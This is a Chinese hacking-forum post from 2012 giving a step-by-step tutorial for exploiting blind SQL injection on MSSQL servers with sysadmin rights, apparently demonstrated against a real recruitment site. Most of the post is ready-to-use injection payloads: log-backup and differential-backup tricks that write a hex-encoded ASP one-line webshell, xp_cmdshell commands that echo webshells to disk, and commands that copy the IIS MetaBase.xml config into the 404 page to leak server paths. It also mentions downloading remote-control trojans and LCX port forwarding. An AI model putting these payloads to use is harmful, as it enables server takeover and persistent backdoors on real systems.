找回密码
 立即注册
查看: 2450|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
- \' m4 K3 p& O* k0 W3 B5 J; k/ }1 |0 k# w/ h& C: C$ P
3 Q+ e/ B- [/ p( ~/ W# |
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。5 `7 p' L/ `. g6 G
6 C8 j6 A% b# o* U1 R/ P
                                                                 
% S( ^8 P% W7 ?2 e                                                                 * r* Q( V4 q& e* l5 C9 B. `( C
                                                                  论坛: http://www.90team.net/
+ B" M# B4 N  H* [7 o! E& l
2 ^% j1 ^: {1 p  s$ ]& Y% }! b% `6 F. ]. I6 C. r
# @  U0 W! p! J+ r" i- u8 r) y
友情检测国家人才网, @/ R; ^( W' |- h

) M' j( k  o& m5 J9 A) u5 o
- a3 A  I# I( x6 H$ @# M内容:MSSQL注入SA权限不显错模式下的入侵0 N) E6 ^) }* k) U

+ q& G, V; K* @6 N8 |3 G9 o: w/ b6 J0 }
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
4 A! t$ r0 g! o! L: q- P' D+ B5 i; l- t/ a
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。  ^7 |" O- {6 h7 {/ k1 ]. h
( t7 L+ l) u/ y! e
1 d. N. i( A- v
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。0 X7 N6 R) m* s2 @6 e9 _0 U

% y4 ]# Z& k4 P. p思路:
! p  @% E2 d+ S' E) G
* o! _) ~0 o9 ^. n首先:
- |9 s, M$ {9 s- J7 m' r) w* m! T; ?. ~1 _" b
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。* M" f4 K. w. A* l
! [/ v: Z, X0 p
1.日志备份获得Webshell3 p+ T' t% [9 G9 X& {- |# X
1 ~; H- q7 D6 d& e& `) F5 z
2.数据库差异备份获得Webshell: w+ G+ h% T+ v5 l# ^6 Q' S
  b. C% k6 i3 U+ U
4.直接下载免杀远控木马。3 G7 T% a# B0 V
6 e# V4 L! D8 I: U6 w/ ?) P/ |
5.直接下载LCX将服务器端口转发出来
/ h* |$ E, v) a8 C( q, U/ W7 j! ~( b' w; S- K  t8 S
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
: ^  f3 t' M0 X" \2 f9 a1 W+ ]  }) b, R: v, }' o: o$ i/ L6 v
( d& S0 _8 L5 q# A

! ~  H. W8 ~2 L: L8 q1 m; U+ b5 _在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 6 k! H' e! `  Y% k# r$ y" v
6 V6 [: U' G8 k% V, G2 u
我直接演示后面一个方法
  `: |0 W( Z0 n! T. O
/ u. W  ~4 w$ u/ p# _# C7 G4 p
' `; B! T) m6 S2 f$ j分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL " D) F# `& b5 c) j
9 G- x6 {8 }3 p$ b
9 v* B* E; C: K$ s5 ~. A
6 d) K+ Z6 h; T) Z4 x

" K- m" q* t- R, W7 V◆日志备份:
/ Y: d& W% |( u& B2 R% R% J8 @4 q9 p6 e* |

: B9 L$ }( E8 P6 g  d1. 进行初始备份
3 `8 @# g# b1 C. o# t9 \! d; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
  N+ q  |) c. M0 s! T# @/ F7 l: L+ T2 j
2. 插入数据4 ?9 G& }: C/ l$ K3 c
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--' J  f# J1 u+ k2 R. A* ?

  l1 V2 V9 b: q. Y6 E. z0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>( t9 k" n3 e$ Y! u' f" V1 c
    U- m, s8 L+ S
3. 备份并获得文件,删除临时表
3 p% B3 P" x$ q* l! d;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
% w, E5 _  T1 ]; v
& i/ j) t- C/ ^# S. b: j5 k. l) `" k; N# C% R
, o+ O) S( A$ C
◆数据库差异备份
/ h* |# u$ x1 e1 I, b' r* W; N( B% Y, g
(1. 进行差异备份准备工作
& L  ]) c! d8 j4 \4 H/ k1 Y1 ?& |4 N/ z5 x4 {3 S0 z: h
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
( L' c/ j* B) U" L/ E6 q1 r) O! N
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
5 D( i9 R# q: c 0 D) M: R7 i  R) z9 I* ?3 Y# d

( I' H3 P& s- Y& s% e1 y4 |(2. 将数据写入到数据库) C  c2 _7 ~4 ~* R! Z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
" |4 z6 H* t+ R8 o# x4 @
' i# I$ [1 s/ f0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>8 Z6 O- Q1 t9 {# V1 o4 W

" Y& `3 h4 H4 c- k7 |3. 备份数据库并清理临时文件5 F8 o4 e! i! e: Q* d

' y, a" T/ X4 n8 Y1 G! ?* @;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--3 L3 O6 h; [6 ^3 I7 x+ ]+ w

8 J' V1 C9 l6 a. x+ l. L9 u: D1 s. e0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 1 a7 {8 D; c  ~' |3 e8 L' j

9 O; g& O6 ~2 \
9 W" H$ ~0 j' E  z6 d. y
: a5 }3 p- v/ ^* p8 S" L用^转义字符来写ASP(一句话木马)文件的方法:   
+ ^+ T2 a' X7 {' g" e
, @- X; Z* D$ @! S* L1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
% m" q. z# W4 i+ y0 ]' \" X! M" W. Y8 z
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 0 |/ b/ {. S0 q& e+ ~; t+ N

$ y& h9 z% y" g6 \' P3 \+ e0 t. R读取IIS配置信息获取web路径# s/ s# N) j$ L, P0 e' Z! ]
* n9 `5 `2 v: Y5 B7 S
     * f! y9 X" Y* U5 J4 G+ S1 t, H
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--6 V0 s& ^! q* z8 b
- o! i3 Z/ g# t7 J/ w% B
执行命令3 G( T$ h- C: p9 Q
     0 L  n8 a( Y7 c1 |: M
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--# u0 E6 \; I2 [* h3 B5 `1 n

5 I0 o4 v- d7 N0 i7 t% D6 Q) C$ a+ b+ }1 q, H
: _( u6 K( G" T8 a5 S# @" p8 ^3 ^

4 K7 A3 p) ^  F9 A- x" h7 ~+ v) o2 P  Q9 K0 }. G& }) k

3 S& u+ u8 Z2 C* t8 n% \! u' M
: K2 z% F: F; h% g! D4 F# b4 n4 A+ {3 W6 y0 z4 e6 V. F
- r1 o5 ~$ ~+ o& n

! W5 H5 R8 R% h0 r0 m6 H, i: T/ h) o& Z+ ]: D1 z+ Y8 u

! S+ F% ~8 h/ D+ u" e' l- @' }2 `/ O5 u. w" R. v8 _: S1 \  d

) c8 j9 o% Y* {6 M% c
( z- ^7 K7 ]/ _. z( i
2 \- T+ f! s$ [
, @" \( ]( e% p# D& o6 c
' E7 a/ f- V. B2 L% H: E- D' g
4 o: f# `& F* T2 N, I. s% X0 Q
" |: t7 d( C, |  K  @0 C. l  x
: ], g8 H9 @% i* P! s
$ h3 h9 H  x4 u& X7 S6 k
* x* {  f4 @$ ?

/ N: u' s( A: S
+ i- `( w% e4 s2 i3 |5 t# W( ?: W+ z" g8 G- G
7 J2 }8 U% f! U7 Q. i: N

1 f+ L0 a5 X; A5 \5 X' H2 ?! j8 e7 p) m% `

& G2 S2 |1 b& S% X4 E
9 w7 I5 l3 w  W9 Z7 z0 j1 }( T# M: ]+ i& m. l) c$ r
5 h  G. x& ^) u0 r1 ]4 l
/ T. z& D8 {, \( x/ O9 M% I

  h+ {: z7 c; `6 ]: Q1 F) A  a# C! s5 h6 a7 j

% s4 w9 S3 u/ p
4 L5 m9 ~& Y: q: Y5 W2 N
- H" S& i, i$ N4 N2 Y" e1 P  v) y4 {( t. M
- D- K; q! x2 O

5 ]$ ~& m( i. y% ?9 R! W9 r, y* e% q: {- R" I9 ]& D7 `
; ?4 u/ s  F( Q: C" T
  J' Y1 l3 {. a2 e5 Q4 J

/ {) \! b; T  l3 {6 m3 Q; V  p' L: g9 \5 U$ a" D- F; ~: a  q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表